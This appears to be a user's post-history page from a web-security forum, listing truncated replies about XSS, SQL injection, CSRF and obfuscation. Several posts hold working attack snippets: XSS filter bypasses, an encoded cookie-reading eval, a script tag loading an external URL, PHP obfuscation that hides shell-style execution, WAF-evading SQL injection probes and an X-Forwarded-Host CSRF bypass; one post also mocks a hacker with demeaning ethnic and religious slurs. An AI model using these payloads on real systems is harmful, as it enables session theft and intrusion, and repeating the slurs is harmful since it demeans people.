Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Q and A on cross site request forgeries and breaking into sessions. It's one of the attacks that XSS enables and the attack of the future. For Session, fixations, hijacking, lockout, replay, session riding etc.... 

Pages: 12345...LastNext
Current Page: 1 of 6
Results 1 - 30 of 164
6 months ago
barbarianbob
WOWIE!!!!!!!!!!!!!!!!!!!!
Forum: Projects
1 year ago
barbarianbob
*head flies back as I say "OH WOWW ! !"* Epic, bro, epic..
Forum: DoS
1 year ago
barbarianbob
1 year ago
barbarianbob
No I did not.
Forum: OMG Ponies
2 years ago
barbarianbob
Here's a fun little thing someone linked me to today: http://utf-8.jp/public/aaencode.html Input: alert("Hello, JavaScript") Output: ゚ω゚ノ= /`m´)ノ ~┻━┻ //*´∇`*/ ['_']; o=(゚ー゚) =_=3; c=(゚Θ゚) =(゚ー゚)-(゚ー゚); (゚Д゚) =(゚Θ゚)= (o^_^o)/ (o^_^o);(゚Д゚)={゚Θ゚: '_' ,゚ω゚ノ : ((゚ω゚ノ==3) +'_') [゚Θ゚] ,゚ー
Forum: Obfuscation
2 years ago
barbarianbob
<iframe src="//victim/vuln.php?injection=%3Cscript%3Elocation%3Dname%3B%3C%2Fscript%3E" name="javascript:alert(1)"></iframe>
Forum: XSS Info
2 years ago
barbarianbob
Hey Divine_Defender. It's me, Divine_Fire and I regret nothing!!
Forum: Intro
3 years ago
barbarianbob
<scrscriptipt>alert(1)</scrscriptipt>
Forum: XSS Info
3 years ago
barbarianbob
Not part of the new minification effort, but that bitwise stuff is really good for obfuscation. Ex: $create_function = '`pd`td_dtl`thll'|'cbaa`a_babc`acb'; $register_shutdown_function = 'pddhptdp_phttdltl_dtl`thll'|'bacac`ab_c`a``ccb_babc`acb'; $shell = 'var_dump(123);'; $register_shutdown_function($create_function('', $shell)); Here all the var names can be changed, but you can still
Forum: Obfuscation
3 years ago
barbarianbob
Yeah man. I'll help you find the download. First you have to
Forum: SQL and Code Injection
3 years ago
barbarianbob
It looks like they're treating blocks differently. var y=123; { function y(){} }; y; FF returns: function y() {} GC returns: 123 Edit: alert(z); { function z(){} }; alert(z); //FF errors //GC alerts "function z(){}" twice var z=123; alert(z); { function z(){} }; alert(z); //FF alerts "123", then "function z(){}" //GC alerts "123" twice
Forum: Obfuscation
3 years ago
barbarianbob
No. Defacing is dumb.
Forum: OMG Ponies
3 years ago
barbarianbob
If you switch the eval() to a var_dump(), the output will contain the key. You can also paste the code you have, and I'll try helping decode it.
Forum: Obfuscation
3 years ago
barbarianbob
Then use this:
Forum: SQL and Code Injection
3 years ago
barbarianbob
Your closing tag in the document.write is terminating the script tag early. Split it up into a concatenation: <script>document.write("<script src\u003d'//qr.net/4ds'></scr"+"ipt>")</script>
Forum: XSS Info
3 years ago
barbarianbob
I'm looking at lines 145,146 of csrf.py good_referer = 'https://%s/' % request.get_host() if not same_origin(referer, good_referer): And from the link I posted, the value for HTTP_X_FORWARDED_HOST overrides the real host. So instead of spoofing your referer to match the host, trick the host into thinking it's the referer: POST / HTTP/1.1 host: good.com referer: evil.com X_FORWARDED_HOST: e
Forum: CSRF and Session Info
3 years ago
barbarianbob
Can you send http_x_* headers with just js?
Forum: CSRF and Session Info
3 years ago
barbarianbob
I got them both using blind injection. Are they also supposed to be doable without using blind, as in outputting the password in the list? edit: I'm guessing "No" Anyway, it's a nice challenge. It gets you looking later on in the query than usual, since most challenges deal with the WHERE clause.
Forum: SQL and Code Injection
3 years ago
barbarianbob
I got it :D As already mentioned, it's a really nice challenge because it requires you to look from a different angle.
Forum: XSS Info
3 years ago
barbarianbob
Excellent work, the_master
Forum: OMG Ponies
3 years ago
barbarianbob
Try a bunch of half injections to see what it 403s with: www.site.com/?url=articles/category/union/ www.site.com/?url=articles/category/select/ www.site.com/?url=articles/category/union+select/ www.site.com/?url=articles/category/union+all+select/ www.site.com/?url=articles/category/union++++all++++select/ www.site.com/?url=articles/category/union+%23%0aselect/ etc.
Forum: SQL and Code Injection
3 years ago
barbarianbob
The 403 is probably happening from apache blocking characters in filenames. You can bypass that by using cakephp's alternate input format: www.site.com/?url=articles/category/6'blah I took a look at the current version of cakephp and it splits arguments by slashes (and all other characters are valid), so you can't do obfuscation with /* and */. But I also don't see any WAFs in the code, so you
Forum: SQL and Code Injection
3 years ago
barbarianbob
Do you have more than one place to add you input into the <script>, such as in the following? <script> var w = '<arg1>'; var x = '<arg2>'; </script> If so, you can try ?arg1=asdf\&arg2=;alert(1);\ The first one will slash the endquote, keeping the string going, until it hits the second string, where it will close right before your second input.
Forum: XSS Info
4 years ago
barbarianbob
Genius muslim algrian hacker, TopSaT13, downloads a script to deface a single page on a website. Considers this an achievement. Thinks defacement isn't retarded and actually means something. Kills you by having sex with your server and your web because you killed his brothers.
Forum: SQL and Code Injection
4 years ago
barbarianbob
It builds html that tries to social engineer people. It says to click a "Like" button and a "Share" button to see it. It's built from javascript to obfuscate it, which is probably to avoid automatic reports. It's nothing malicious.
Forum: Obfuscation
4 years ago
barbarianbob
Oh, so this is pretty much non ."' try alert(eval(atob(/ZG9jdW1lbnQuY29va2ll/(/ZG9jdW1lbnQuY29va2ll/)))) and obfuscate future code using this var code='alert(123)';alert('eval(atob(/'+btoa(code)+'/(/'+btoa(code)+'/)))');
Forum: XSS Info
4 years ago
barbarianbob
addslashes/magic_quotes is breaking it alert(eval(atob(/ZG9jdW1lbnQuY29va2ll/.source)))
Forum: XSS Info
4 years ago
barbarianbob
I don't think this one's possible because of the strpos() validation which restricts \, /, and : You can't pass an array to error the strpos (i.e. ?file[]=123) because then you won't be able to do readfile(). I was initially expecting passing a data wrapper to obfuscate the file name in base64 would work. But although the data wrapper looks lenient in its construction ('data:::/;base64,SSBsb3ZlI
Forum: SQL and Code Injection
4 years ago
barbarianbob
It's passing the array key hxxp://falcon.biucentrax.com/biucentrax/?idwp=499d3ef755e464.08815780
Forum: SQL and Code Injection
4 years ago
barbarianbob
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-2225 This links to Stefan Esser's twitter: http://twitter.com/i0n1c/statuses/16447867829 And POC output: http://pastebin.com/mXGidCsd Does anyone have more info on this? Because holy shit he has been saying to never unserialize input since forever ago but a ton of people still do.
Forum: SQL and Code Injection
Pages: 12345...LastNext
Current Page: 1 of 6